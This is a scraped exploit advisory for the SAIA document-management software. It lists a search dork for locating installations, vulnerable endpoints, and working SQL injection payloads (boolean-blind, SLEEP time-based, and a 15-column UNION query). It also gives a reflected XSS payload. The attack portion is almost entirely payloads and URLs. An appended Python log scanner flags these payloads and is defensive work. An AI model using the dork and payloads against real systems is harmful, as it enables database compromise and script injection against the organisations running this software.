## https://sploitus.com/exploit?id=1337DAY-ID-34153
################################
# Exploit Title: SAIA (Software Gestion Documental) SQL Injection & XSS Vulnerability
# D0rk: intext:"Todos los derechos reservados CERO K"
# Exploit Author: n4pst3r
# Vendor Homepage: https://www.cerok.co/
# Tested on: Windows 10, Debian 9
################################
---------------------------------------------------------
SQLi:
http://localhost/path/saia/pantallas/buscador_principal.php?idbusqueda=[SQLi]&cmd=resetall
http://localhost/path/saia/noticia_index/mostrar_noticia.php?idnoticia_index=[SQLi]
Response:
Parameter: idbusqueda (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: idbusqueda=24 AND 7287=7287&cmd=resetall
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: idbusqueda=24 AND (SELECT 7591 FROM (SELECT(SLEEP(5)))Dnrp)&cmd=resetall
Type: UNION query
Title: Generic UNION query (NULL) - 15 columns
Payload: idbusqueda=-3640 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a716a71,0x4c76476b62684f414766684c426c745774496d596c65494b486371636149787269794354564b6551,0x716a767171),NULL,NULL-- treG&cmd=resetall
XSS:
https://localhost/path/saia/index.php?texto_salir=[XSS]
Payload: <img src=xss onerror=alert("XSS")>
# 0day.today [2020-03-30] #
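
Added example (not part of the original advisory or the vendor's code): a check a defender can run over web access logs to flag requests that put non-numeric values in idbusqueda / idnoticia_index or markup in texto_salir on the endpoints listed above. The integer-only rule for the id parameters, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint suffix -> (parameter named in the advisory, expected kind of value).
# Treating the id parameters as integer-only is an assumption drawn from the
# advisory's sample value (idbusqueda=24), not from SAIA's source code.
WATCHED = {
    "/saia/pantallas/buscador_principal.php": ("idbusqueda", "int"),
    "/saia/noticia_index/mostrar_noticia.php": ("idnoticia_index", "int"),
    "/saia/index.php": ("texto_salir", "text"),
}
INT_RE = re.compile(r"\d+")
MARKUP_RE = re.compile(r"[<>]|\bon\w+\s*=|javascript:", re.I)
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def inspect_request(target):
    """Return (parameter, reason) findings for one request target (path?query)."""
    parts = urlsplit(target)
    findings = []
    for suffix, (param, kind) in WATCHED.items():
        if not parts.path.endswith(suffix):
            continue
        # parse_qs percent-decodes values, so encoded payloads are compared decoded.
        for value in parse_qs(parts.query, keep_blank_values=True).get(param, []):
            if kind == "int" and not INT_RE.fullmatch(value.strip()):
                findings.append((param, "non-integer value in id parameter"))
            elif kind == "text" and MARKUP_RE.search(value):
                findings.append((param, "markup in reflected parameter"))
    return findings

def scan_log(lines):
    """Yield (line_number, parameter, reason) for combined-format access log lines."""
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            for param, reason in inspect_request(match.group(1)):
                yield number, param, reason

# Constructed sample log lines (documentation IP ranges); payloads are the advisory's own.
SAMPLE_LOG = [
    '203.0.113.5 - - [30/Mar/2020:10:00:00 +0000] "GET /path/saia/pantallas/buscador_principal.php?idbusqueda=24&cmd=resetall HTTP/1.1" 200 512',
    '198.51.100.7 - - [30/Mar/2020:10:00:05 +0000] "GET /path/saia/pantallas/buscador_principal.php?idbusqueda=24%20AND%207287%3D7287&cmd=resetall HTTP/1.1" 200 512',
    '203.0.113.5 - - [30/Mar/2020:10:00:09 +0000] "GET /path/saia/noticia_index/mostrar_noticia.php?idnoticia_index=7 HTTP/1.1" 200 900',
    '198.51.100.7 - - [30/Mar/2020:10:00:12 +0000] "GET /path/saia/index.php?texto_salir=%3Cimg%20src%3Dxss%20onerror%3Dalert(%22XSS%22)%3E HTTP/1.1" 200 300',
    '203.0.113.5 - - [30/Mar/2020:10:00:20 +0000] "GET /path/saia/index.php?texto_salir=Sesion+cerrada HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for number, param, reason in scan_log(SAMPLE_LOG):
        print(f"line {number}: {param}: {reason}")
```

Only query-string values are visible in access logs, so the same parameters sent in a POST body need the equivalent check at a WAF or in the application itself.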